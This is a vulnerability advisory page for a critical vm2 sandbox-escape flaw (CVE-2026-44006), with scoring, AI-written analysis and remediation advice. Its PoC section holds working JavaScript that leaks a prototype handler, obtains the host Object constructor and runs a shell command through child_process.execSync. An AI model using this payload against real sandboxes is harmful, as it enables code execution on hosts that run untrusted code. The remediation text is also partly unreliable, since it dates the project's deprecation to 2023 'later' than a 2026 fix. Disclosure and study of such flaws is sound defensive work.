Skip to main content

vm2 CVE-2026-44006

CRITICAL
Code Injection (CWE-94)
2026-05-07 https://github.com/patriksimek/vm2 GHSA-qcp4-v2jj-fjx8
10.0
CVSS 3.1 · Vendor: https://github.com/patriksimek/vm2
Share

Severity by source

Vendor (https://github.com/patriksimek/vm2) PRIMARY
10.0 CRITICAL
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Red Hat
10.0 HIGH
qualitative

Primary rating from Vendor (https://github.com/patriksimek/vm2).

CVSS VectorVendor: https://github.com/patriksimek/vm2

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

3
Source Code Evidence Fetched
May 07, 2026 - 04:15 vuln.today
Analysis Generated
May 07, 2026 - 04:15 vuln.today
CVE Published
May 07, 2026 - 03:54 nvd
CRITICAL 10.0

DescriptionCVE.org

Summary

It is possible to reach BaseHandler.getPrototypeOf, which can be used to get arbitrary prototypes

Details

https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L655-L658

BaseHandler can be reached via util.inspect (same as https://github.com/patriksimek/vm2/commit/57971fa423abeb66f09e47e18102986549474ca8)

PoC

js
let obj = {
	subarray: Buffer.prototype.inspect,
	slice: Buffer.prototype.slice,
	hexSlice: () => '',
};

let sym;

obj.slice(10, {
	showHidden: true,
	showProxy: true,
	depth: 10,
	stylize(a) {
		const handler = this.seen && this.seen[1];

		if (handler && handler.getPrototypeOf) {
			gP = handler.getPrototypeOf;
			HObjectProto = gP(gP(gP(gP(Buffer))));
			HObject = HObjectProto.constructor;
			sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0);
		}
		return a;
	},
});

obj = {
	[sym]: (depth, opt, inspect) => {
		inspect.constructor('return process')()
		.getBuiltinModule('child_process')
		.execSync('id', { stdio: 'inherit' });
	},
	valueOf: undefined,
	constructor: undefined,
};

WebAssembly.compileStreaming(obj).catch(() => {});

Impact

Sandbox Escape -> RCE

AnalysisAI

Prototype chain manipulation in vm2 Node.js sandbox library enables complete sandbox escape and remote code execution via util.inspect handler leakage. Attackers can exploit BaseHandler.getPrototypeOf through crafted objects to access host process primitives and execute arbitrary system commands. Public exploit code exists (vendor-published PoC demonstrates child_process.execSync execution). Fixed in vm2 version 3.11.0 alongside 12 other critical sandbox escape vulnerabilities in coordinated security release.

Technical ContextAI

vm2 is a JavaScript sandbox library for Node.js that isolates untrusted code execution. The vulnerability exploits the bridge mechanism between sandboxed and host realms. By chaining Buffer.prototype methods with custom objects containing a malicious stylize callback passed to util.inspect, attackers reach the internal BaseHandler's getPrototypeOf trap. This allows traversing the prototype chain to obtain host-realm Object constructor, extracting internal symbols from Buffer.prototype, then crafting objects with symbol-keyed properties that execute when WebAssembly.compileStreaming triggers internal inspection. The exploit abuses CWE-94 Improper Control of Generation of Code, specifically prototype pollution combined with constructor access to break out of the VM's realm isolation and invoke Node.js child_process APIs directly.

RemediationAI

Upgrade to vm2 version 3.11.0 immediately, as confirmed in the vendor release notes at https://github.com/patriksimek/vm2/releases/tag/v3.11.0. This coordinated security release patches 13 distinct sandbox escape vulnerabilities including this prototype chain manipulation issue. No workarounds exist that maintain sandbox integrity - the underlying bridge architecture required fundamental redesign. If immediate upgrade is impossible, stop executing untrusted code in vm2 entirely and migrate to isolated-vm or OS-level sandboxing (Docker containers, VMs, gVisor). Disabling specific Node.js features is insufficient because multiple independent escape vectors existed. The new 3.11.0 release also introduces bufferAllocLimit configuration to mitigate heap exhaustion DoS attacks - review and configure this limit based on your trust model. Note that vm2 maintainers later deprecated the entire project in 2023 due to ongoing security challenges, recommending migration to isolated-vm for production use cases requiring untrusted code execution.

Vendor StatusVendor

Share

CVE-2026-44006 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy